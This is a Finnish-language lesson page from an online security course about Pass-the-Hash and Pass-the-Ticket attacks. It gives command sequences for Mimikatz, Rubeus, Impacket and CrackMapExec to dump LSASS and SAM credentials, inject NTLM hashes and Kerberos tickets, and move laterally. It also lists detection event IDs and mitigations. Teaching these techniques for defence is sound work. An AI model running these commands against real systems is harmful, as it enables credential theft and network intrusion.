Pass-the-Hash- ja Pass-the-Ticket-hyökkäykset
Käytätte tunnistetietojen hajautusarvoja ja Kerberos-lippuja sivuttaisliikkumiseen tuntematta selväkielisiä salasanoja.
Pass-the-Hash- ja Pass-the-Ticket-hyökkäykset on ilmainen Cyber Security Academy-oppitunti CoddyKitissä. Tämä on oppitunti 2/4. Voit lukea tästä oppimispolusta kokonaan mitkä tahansa 3 oppituntia ilmaiseksi — sen jälkeen CoddyKit PRO avaa kaikki oppitunnit sekä käytännön harjoittelun sisäänrakennetulla koodieditorilla ja ympäri vuorokauden toimivalla tekoälytuutorilla. Oppitunti kuuluu Cyber Security Academy-oppimispolkuun, ja edistymisesi synkronoituu verkon ja CoddyKit-sovelluksen välillä. Cyber Security Academy-kurssilla on yhteensä 4 oppituntia.
Miksi nämä hyökkäykset ovat mahdollisia
Windowsin tunnistetietoprotokollat tallentavat todennussalaisuuksia (NTLM-tiivisteitä ja Kerberos-tikettejä) muistiin. SYSTEM-oikeudet saanut hyökkääjä voi poimia nämä salaisuudet ja käyttää niitä uudelleen todentautuakseen toisina käyttäjinä ilman salasanoja.
NTLM-tiivisteiden poimiminen Mimikatzilla
Mimikatz on Windowsin johtava tunnistetietojen poimintatyökalu. SYSTEM- tai järjestelmänvalvojan oikeuksilla suoritettuna se lukee LSASS-prosessin muistia ja poimii NTLM-tiivisteitä sekä selväkielisiä tunnistetietoja.
# Run mimikatz as Admin:
mimikatz.exe
# Enable debug privilege
privilege::debug
# Dump LSASS credentials
sekurlsa::logonpasswords
# Dump local SAM hashes
lsadump::samPass-the-Hash (PtH) Mimikatzilla
PtH syöttää NTLM-tiivisteen uuteen istuntoon ilman, että selväkielistä salasanaa tarvitsee tietää. Tiiviste todentaa käyttäjän etäpalveluihin NTLM:n avulla, mikä mahdollistaa tehokkaan sivuttaissiirtymisen muihin Windows-isäntiin.
# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
/ntlm:aad3b435b51404eeaad3b435b51404ee \
/run:cmd.exe
# Opens cmd.exe authenticated as that userPass-the-Hash Impacketilla
Impacket tarjoaa PtH:ta varten Python-työkaluja: psexec.py, smbexec.py ja wmiexec.py hyväksyvät NTLM-tiivisteet suoraan etäkomentojen suorittamista varten.
# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
-hashes aad3b435...:8846f7eaee8fb117...
# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
-hashes :8846f7eaee8fb117ad06bdd830b7586cKerberos-tikettien poimiminen
Myös Kerberos-tiketit tallennetaan LSASS:n muistiin. Mimikatz poimii ne, ja Rubeus on Windowsin erityisesti Kerberos-tikettien käsittelyyn tarkoitettu työkalu.
# Mimikatz: export all tickets
sekurlsa::tickets /export
# Rubeus: list tickets
Rubeus.exe triage
# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgtPass-the-Ticket (PtT)
PtT syöttää varastetun Kerberos-tiketin nykyiseen istuntoon. Tiketti todentaa palveluihin tiketin alkuperäisen omistajan nimellä — tiivistettä tai salasanaa ei tarvita.
# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi
# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi
# Verify injection
klistLSASS:n dumppaaminen etänä
Saavutetusta jalansijasta LSASS voidaan dumpata etänä CrackMapExecillä tai Impacketin secretsdumpilla — kohteeseen ei tarvita interaktiivista istuntoa.
# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa
# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100Sivuttaissiirtymisen reitit
Kun tiivisteitä tai tikettejä on saatu, siirry sivusuunnassa: käytä PtH:ta muihin koneisiin paikallisten järjestelmänvalvojatunnusten uudelleenkäytön avulla, käytä PtT:tä toimialueen palveluihin pääsemiseksi ja etene kohti toimialueen järjestelmänvalvojan oikeuksia kohdistamalla hyökkäys etuoikeutettuihin tileihin.
PtH:n ja PtT:n havaitseminen
Puolustajat havaitsevat PtH:n esimerkiksi seuraavien avulla: Event ID 4624 -tapahtuma (kirjautuminen), jossa kirjautumistyypin arvo on 3 eikä vastaavaa interaktiivista kirjautumista ole, NTLM-todennuksen poikkeamat sekä Mimikatzin tunnusmerkit muistissa tai levyllä.
# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential useLieventämistoimet
Keskeisiä lieventämistoimia ovat Credential Guardin käyttöönotto (se suojaa LSASS:ää virtualisoinnin avulla), paikallisten järjestelmänvalvojatunnusten uudelleenkäytön rajoittaminen koneiden välillä (LAPS), Protected Users -ryhmän vaatiminen etuoikeutetuilta tileiltä sekä NTLM:n poistaminen käytöstä, jos mahdollista.
Overpass-the-Hash
Overpass-the-Hash muuntaa NTLM-tiivisteen Kerberos-TGT:ksi. Tämä on hyödyllistä ympäristöissä, joissa NTLM on estetty mutta Kerberos käytettävissä, tai kun TGT:tä tarvitaan Kerberos-hyökkäysten jatkamiseen.
# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
/ntlm:8846f7eaee8fb117ad06bdd830b7586c \
/run:powershell.exe
# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...Pikatarkistus
Mikä Windowsin suojausominaisuus suojaa LSASS:n tunnistetietojen tallennusta virtualisoinnin avulla?
Yhteenveto: PtH ja PtT
Pass-the-Hash ja Pass-the-Ticket muodostavat Active Directoryn sivuttaissiirtymisen perustan. Molemmat hyödyntävät Windowsin tunnistetietojen välimuistia LSASS:ssa. Mimikatz ja Impacket tekevät tietojen poimimisesta ja uudelleenkäytöstä helppoa. Suojaudu Credential Guardilla, LAPS:lla ja Protected Users -ryhmällä sekä valvomalla NTLM- ja Kerberos-todennustapahtumia tarkasti.
Opi Cyber Security Academy tekoälytuutorin avulla — ilmaiseksi
Kirjoita ja suorita oikeaa koodia selaimessa, saa välitöntä apua tekoälytuutorilta ympäri vuorokauden ja jatka siitä, mihin jäit, verkossa tai sovelluksessa.
- Kurssit
- 76
- Oppitunnit
- 303
Usein kysytyt kysymykset
Onko oppitunti ”Pass-the-Hash- ja Pass-the-Ticket-hyökkäykset” ilmainen?
Kyllä — voit lukea täällä verkossa kokonaan ilmaiseksi mitkä tahansa Cyber Security Academy-oppimispolun 3 oppituntia, myös oppitunnin “Pass-the-Hash- ja Pass-the-Ticket-hyökkäykset”. Sen jälkeen CoddyKit PRO avaa kaikki oppitunnit sekä interaktiiviset harjoitukset sisäänrakennetulla koodieditorilla ja ympäri vuorokauden toimivalla tekoälytuutorilla. Cyber Security Academy-kurssilla on yhteensä 4 oppituntia.
Mitä opin oppitunnilla ”Pass-the-Hash- ja Pass-the-Ticket-hyökkäykset”?
Käytätte tunnistetietojen hajautusarvoja ja Kerberos-lippuja sivuttaisliikkumiseen tuntematta selväkielisiä salasanoja. Harjoittelet Cyber Security Academy-aihetta koodilla, jonka suoritat suoraan selaimessa. Ympäri vuorokauden käytettävissä oleva tekoälytuutori vastaa kysymyksiisi oppitunnin aikana.
Tarvitsenko kokemusta aloittaakseni Cyber Security Academy-opiskelun?
Aiempi kokemus ei ole tarpeen. CoddyKitin Cyber Security Academy-oppimispolku sopii vasta-alkajista edistyneisiin, joten voit aloittaa tästä tai alusta ja edetä omaan tahtiisi. Tämä on oppitunti 2/4.
Kuinka kauan ”Pass-the-Hash- ja Pass-the-Ticket-hyökkäykset”-oppitunnin suorittaminen kestää?
Useimmat CoddyKitin oppitunnit kestävät noin 5–10 minuuttia. Jokainen oppitunti on lyhyt ja interaktiivinen, joten edistyt tasaisesti ja voit jatkaa siitä, mihin jäit – sekä verkossa että sovelluksessa.
Voinko kirjoittaa ja suorittaa koodia tällä Cyber Security Academy-oppitunnilla?
Kyllä. Jokainen Cyber Security Academy-oppitunti sisältää sisäänrakennetun koodieditorin, joten voit kirjoittaa ja suorittaa oikeaa koodia suoraan selaimessa ja saada välitöntä palautetta tekoälyltä – paikallista asennusta ei tarvita.
Kaikki tämän kurssin oppitunnit
- Windows-todennus: NTLM ja Kerberos
- Pass-the-Hash- ja Pass-the-Ticket-hyökkäykset
- Kerberoasting ja AS-REP Roasting
- Active Directoryn vahvistaminen